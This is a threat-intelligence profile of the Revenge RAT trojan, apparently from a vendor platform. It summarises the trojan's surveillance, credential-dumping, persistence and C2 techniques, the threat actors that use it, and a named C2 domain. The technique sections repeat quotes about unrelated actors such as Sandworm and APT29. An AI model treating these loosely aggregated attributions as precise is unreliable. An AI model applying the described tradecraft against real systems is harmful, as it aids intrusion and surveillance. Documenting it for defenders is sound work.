Revenge RAT
Revenge RAT is a remote access trojan (identified in the content as S0379) with surveillance, credential access, discovery, persistence, and remote administration capabilities. Reported functionality includes audio capture/microphone interception, screen capture, video capture, keylogging, OS credential dumping, system information discovery, network configuration discovery, and gathering the username from the infected system. It supports remote control through a plugin for Remote Desktop Protocol (RDP) access and can transfer additional tools to victim systems.
Execution and persistence behaviors directly mentioned in the content include use of Windows command shell and PowerShell, including the PowerShell Reflection.Assembly technique to load itself into memory, use of mshta.exe to run malicious scripts, and creation of scheduled tasks to run malicious scripts at different intervals. The content also states it can establish persistence through scheduled tasks and a Winlogon Helper DLL.
For command and control, Revenge RAT uses bidirectional web-service communication, and the content specifically notes that it uses Base64 to encode information sent to its C2 server. In one campaign, blogpost.com was used as its primary command-and-control server.
The malware is described as publicly available and cross-platform in the provided content. It has been used by the Bahamut threat actor for remote control, alongside NETWIRE. The content also notes that campaigns in 2022 delivered a mixture of malware including Loda, Revenge RAT, and AsyncRAT. High-confidence indicators and artifacts explicitly mentioned in the content include use of blogpost.com as a C2 server, mshta.exe execution, PowerShell Reflection.Assembly in-memory loading, scheduled-task-based execution, and Base64-encoded C2 data.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“In 2022, campaigns delivered a mixture of malware such as, Loda, Revenge RAT, and AsyncRAT.”
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Bahamut utilized the publicly available, cross-platform remote administration tools (RATs) NETWIRE and Revenge RAT for remote control.
“In 2022, campaigns delivered a mixture of malware such as, Loda, Revenge RAT, and AsyncRAT.”
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
4 techniques“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Persistence
3 techniques“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Privilege Escalation
3 techniques“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Stealth
3 techniques"Indirect Command Execution" (listed under Revenge RAT)
"System Binary Proxy Execution: Mshta" (listed under Revenge RAT)
"Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses," "Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk," and "Turla has also used PowerShell scripts to load and execute malware in memory."
Credential Access
2 techniques"OS Credential Dumping" (listed under Revenge RAT)
Discovery
3 techniquesThe content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
Lateral Movement
1 technique"Remote Services: Remote Desktop Protocol" (listed under Imminent Monitor, jRAT, njRAT, Revenge RAT, WarzoneRAT)
Collection
4 techniques"Input Capture: Keylogging" (listed under Agent Tesla, AsyncRAT, Imminent Monitor, jRAT, NETWIRE, njRAT, Revenge RAT, WarzoneRAT)
"Screen Capture" (listed under Agent Tesla, AsyncRAT, jRAT, NETWIRE, njRAT, Revenge RAT)
"Audio Capture" (listed under Imminent Monitor, jRAT, Revenge RAT)
"Video Capture" (listed under Agent Tesla, AsyncRAT, Imminent Monitor, jRAT, njRAT, Revenge RAT, WarzoneRAT)
Command and Control
7 techniquesThe adversaries had communicated to both Dropbox and Pastebin. APT28 has used Google Drive for C2. APT37 leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.
"Web Service: Bidirectional Communication" (listed under Revenge RAT)
"Comnie uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking"; "Revenge RAT used blogpost.com as its primary command and control server"; "Turla JavaScript backdoor has used Google Apps Script as its C2 server"
"Ingress Tool Transfer" (listed under Agent Tesla, AsyncRAT, Imminent Monitor, jRAT, NETWIRE, njRAT, Revenge RAT, Snip3, WarzoneRAT)
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
"Data Encoding: Standard Encoding" (listed under njRAT, Revenge RAT)
DarkComet can open an active screen of the victim’s machine and take control of the mouse and keyboard.
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
35 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Revenge RAT is a remote access trojan used by the RevengeHotels group to gain unauthorized access to hotel and travel industry systems, often delivered via malicious documents exploiting Microsoft Office vulnerabilities.
Revenge RAT is a remote access trojan used by C.A.S to gain remote control over infected systems, execute commands, collect information, and maintain persistence. It is used for file management, credential theft, and defense evasion, including disabling security tools and adding itself to Windows Defender exclusions.
Remote administration tool used by Bahamut to remotely control compromised devices.
Remote access trojan used by TA558, historically delivered via malicious Office documents and later via container formats (ISO/RAR) to establish remote access and support data theft.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.